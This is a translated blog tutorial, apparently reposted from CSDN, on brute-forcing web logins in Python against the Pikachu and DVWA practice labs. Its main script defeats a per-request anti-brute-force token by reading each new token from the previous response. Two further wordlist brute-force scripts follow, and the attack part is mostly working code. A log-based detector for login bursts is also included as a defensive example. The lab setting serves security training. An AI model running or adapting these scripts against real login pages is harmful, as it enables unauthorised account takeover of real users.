
Brute-forcing a website login password with Python (with token verification)

2022-09-12 12:02 CVE-柠檬i Python

This article presents a Python script for brute-forcing a website login password when the login form is protected by a token. The procedure is explained step by step and is useful for anyone learning Python; those interested can read on.

Preface

Previous brute-force article: A simple Python script for brute-forcing website login passwords

The test target is the "token防爆破?" (token anti-brute-force) module in the brute-force section of the Pikachu vulnerability practice platform.

I took a break over Spring Festival: eating, sleeping, playing and reading novels. The reason for writing this script is that, in Burp, I only know how to run a token-based brute force in pitchfork mode; I do not know how to do it in cluster bomb mode (the Cartesian product of both lists). So I simply extended the script I had written earlier to implement that. When I have time I will look into multithreading so the brute force runs faster.


Explanation of the key code

Setting the request headers

Lines 5 to 11: specify the URL and the request headers; user_token is set to the token value obtained when the first request is sent.

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = "8680761fe979039a6f836599906"
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Cookie": "PHPSESSID=17u0i2fakm84eq9oc24boc8715"
}

The get_token function retrieves the token

Lines 13 to 16: this function returns the token extracted from the response body.

The HTTP response contains a hidden input tag whose value is the token:

<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />

Line 15: soup.select looks up the input element whose name attribute is token and reads its value attribute.

def get_token(r):
    # Parse the response HTML and return the value of the hidden <input name="token">
    soup = BeautifulSoup(r.text, "html.parser")
    user_token = soup.select('input[name="token"]')[0]["value"]
    return user_token


Full code

from bs4 import BeautifulSoup
import requests

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = "8680761fe979039a6f836599906"   # token taken from the first response
#proxies = {"http": "http://127.0.0.1:8080"}  # proxy setting, handy for capturing and debugging in Burp
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Cookie": "PHPSESSID=17u0i2fakm84eq9oc24boc8715"
}

def get_token(r):
    # Parse the response HTML and return the value of the hidden <input name="token">
    soup = BeautifulSoup(r.text, "html.parser")
    user_token = soup.select('input[name="token"]')[0]["value"]
    return user_token

if __name__ == "__main__":
    f = open("result.csv", "w", encoding="utf-8")     # store the results in a file, CSV format here
    f.write("用户名" + "," + "密码" + "," + "包长度" + "\n")    # header row of the file

    # iterate over both dictionary files: cluster bomb style brute force
    for admin in open(r"C:\Users\admin\Documents\字典账号.txt"):
        for line in open(r"C:\Users\admin\Documents\字典密码.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     # payload is the POST data
                "username": username,
                "password": password,
                "token": user_token,
                "submit": "Login"
            }

            response = requests.post(url, data=payload, headers=header)
            result = username + "," + password + "," + str(len(response.text))  # username, password and response length

            print(result)           # print to the terminal
            f.write(result + "\n")  # write to the file
            user_token = get_token(response)    # call get_token to obtain the token needed for the next iteration
    print("\n---完成---\n")
    f.close()
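The script above shows why a per-request form token on its own does not slow down automated guessing: every response hands back the next token, the client simply replays it, and the server sees nothing unusual except the request rate. The detector below is an added example, not code from the original article: it flags clients that send more than a threshold of POSTs to the login endpoint inside a sliding window. The access-log lines are constructed, and the endpoint path (taken from the article's URL) and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in Apache combined log format (not captured from a real server).
SAMPLE_LOG = [
    '192.168.171.1 - - [12/Sep/2022:12:02:01 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.1 - - [12/Sep/2022:12:02:02 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.50 - - [12/Sep/2022:12:02:02 +0800] "GET /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.1 - - [12/Sep/2022:12:02:03 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.1 - - [12/Sep/2022:12:02:04 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.1 - - [12/Sep/2022:12:02:05 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6032 "-" "Mozilla/5.0"',
    '192.168.171.1 - - [12/Sep/2022:12:02:06 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6050 "-" "Mozilla/5.0"',
    '192.168.171.50 - - [12/Sep/2022:12:02:20 +0800] "POST /pikachu/vul/burteforce/bf_token.php HTTP/1.1" 200 6050 "-" "Mozilla/5.0"',
]

LOGIN_PATH = "/pikachu/vul/burteforce/bf_token.php"   # assumed login endpoint, from the article's URL
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')

def parse_line(line):
    """Return (ip, timestamp, method, path), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")

def detect_login_bursts(lines, login_path=LOGIN_PATH, threshold=5, window_s=60):
    """Map each client IP to the most login POSTs it made inside any sliding
    window_s-second window; only clients at or above threshold are returned."""
    recent = defaultdict(deque)   # ip -> timestamps of its POSTs still inside the window
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or path != login_path:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # forget attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

if __name__ == "__main__":
    print(detect_login_bursts(SAMPLE_LOG))   # {'192.168.171.1': 6}
```

A lockout or rate limit keyed on the same per-client count is the mitigation the token alone does not provide.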


Run results

[screenshot]

Open the saved file and look for the row whose response length differs from the others.

The CSV viewer does not show the prefix here; it strips leading zeros automatically. Renaming the file to .txt makes it display correctly.

[screenshot]

Try logging in with that pair: the login succeeds.

[screenshot]


Supplement

Below, the editor adds two further sample scripts that brute-force a website login password with Python, in the hope that they are helpful.

Method 1:

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  # proxy setting, handy for capturing in Burp
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Cookie":"security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u"
}

f = open("result.csv","w", encoding="utf-8")
f.write("状态码" + "," + "用户名" + "," + "密码" + "," + "包长度" + "\n")   # header row
for admin in open(r"C:\Users\admin\Documents\字典账号.txt"):
    for line in open(r"C:\Users\admin\Documents\字典密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {"username":username,"password":password,"Login":"Login"}
        Response = requests.get(url,params=payload,headers=header)
        # status code, username, password and response length, one row per attempt
        result = (str(Response.status_code) + "," + username + ","
                  + password + "," + str(len(Response.content)))
        f.write(result + "\n")

f.close()
print("\n完成")

Method 2:

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  # proxy setting, handy for capturing in Burp
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Cookie":"security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u"
}

f = open("result.txt","w", encoding="utf-8")
for admin in open(r"C:\Users\admin\Documents\字典账号.txt"):
    for line in open(r"C:\Users\admin\Documents\字典密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {"username":username,"password":password,"Login":"Login"}
        Response = requests.get(url,params=payload,headers=header)
        # only record the pair whose response contains the success message
        if "Welcome to the password protected area" in Response.text:
            result = username + ":" + password
            print(result)
            f.write(result + "\n")

f.close()
print("\n完成")

That concludes the detailed content of brute-forcing a website login password with Python (with token verification). For more material on brute-forcing website login passwords with Python, see the other related articles on 服务器之家!

Original link: https://blog.csdn.net/weixin_49125123/article/details/122794669
